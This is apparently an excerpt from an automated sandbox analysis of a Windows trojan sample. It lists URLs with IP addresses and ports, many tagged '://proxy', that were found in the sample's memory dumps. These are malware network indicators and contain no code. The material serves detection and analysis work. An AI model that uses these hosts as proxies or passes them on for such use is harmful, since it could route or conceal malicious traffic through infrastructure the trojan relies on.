                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C64DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.45.128.122://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C64DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.45.128.122:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBDF0000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CD1F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://105.113.2.82:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBDF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://105.113.2.82:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6F32000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://105.113.54.250:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6F32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://105.113.54.250:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://105.214.71.103:5678
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://105.214.71.103:5678://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CADAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://106.105.218.244
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CADAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://106.105.218.244://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://106.14.255.124
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA652000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://106.14.255.124://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA652000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://106.14.255.124:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6451000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C677C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://106.15.193.237:8088
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6231000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://106.15.193.237:8088://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://106.45.221.168:3256
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://106.45.221.168:3256://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7FC8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://106.51.62.106:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7FC8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://106.51.62.106:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://106.52.65.104:1080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://106.52.65.104:1080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBFA6000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBBA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://106.74.26.26:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBD71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://106.74.26.26:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CAF3C000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CC0E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.148.100.103:58394
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CAF3C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.148.100.103:58394://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CABA5000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CABBC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.148.100.68:58394
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CABA9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.148.100.68:58394://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBC86000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.148.103.231:58394
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBC86000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.148.103.231:58394://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.148.201.157
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.148.201.157://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.148.201.157:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.148.97.216:58394
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.148.97.216:58394://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9051000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C902F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.148.97.222:58394
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C902F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.148.97.222:58394://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.148.97.234:58394
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.148.97.234:58394://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.148.98.224:58394
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.148.98.224:58394://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.148.99.89:58394
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.148.99.89:58394://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6712000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.148.99.92:58394
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C8005000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.148.99.92:58394://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CD140000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CC61F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.152.98.5:4145
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CC63E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.152.98.5:4145://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB125000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.155.65.11:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB125000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.155.65.11:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBF41000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CC0E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.170.210.100:32542
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBF41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.170.210.100:32542://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.172.79.64:35568
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.172.79.64:35568://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C8EAF000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C8E9C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.173.154.83:49991
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C8EAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.173.154.83:49991://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C677C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.178.9.186:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C677C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.178.9.186:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.180.101.18:21643
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C8490000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.180.101.18:21643://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CAE42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.180.101.18:26850
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CAE42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.180.101.18:26850://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.180.101.18:27053
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.180.101.18:27053://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9267000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.180.101.18:32925
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9267000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.180.101.18:32925://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7DA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.180.101.18:33302
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7DA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.180.101.18:33302://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.180.101.18:3663
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.180.101.18:3663://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.180.101.18:37411
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.180.101.18:37411://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6F32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.180.101.18:38117
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6F32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.180.101.18:38117://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.180.101.18:46503
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.180.101.18:46503://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.180.101.18:5855
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.180.101.18:5855://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.180.101.18:5855x
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.180.101.18:59368
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.180.101.18:59368://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.180.101.226:23031
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.180.101.226:23031://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.180.101.226:51526
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.180.101.226:51526://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.180.101.226:59810
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.180.101.226:59810://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.180.101.226:6539
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.180.101.226:6539://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.180.103.214:17084
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.180.103.214:17084://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.180.103.214:45870
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.180.103.214:45870://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.180.106.173:25975
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.180.106.173:25975://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6566000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.180.76.49:45205
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C677C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.180.76.49:45205://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.180.88.103:16407
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.180.88.103:16407://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.180.88.41:17276
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.180.88.41:17276://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C80D3000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C8112000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.180.88.41:3734
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C80FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.180.88.41:3734://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.180.88.41:37881
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.180.88.41:37881://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.180.89.55:12940
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.180.89.55:12940://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.180.89.55:25508
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.180.89.55:25508://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.180.90.42:17153
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.180.90.42:17153://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.180.90.42:50339
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.180.90.42:50339://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.180.90.88:16002
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.180.90.88:16002://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA7EF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.180.90.88:62908
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.180.90.88:62908://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.180.90.88:63100
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.180.90.88:63100://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.180.90.88:64081
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.180.90.88:64081://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.180.94.137:28813
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.180.94.137:28813://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.180.95.177:1405
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.180.95.177:1405://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.180.95.177:63951
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.180.95.177:63951://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7803000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.180.95.177:64731
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.180.95.177:64731://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.181.132.183:6161
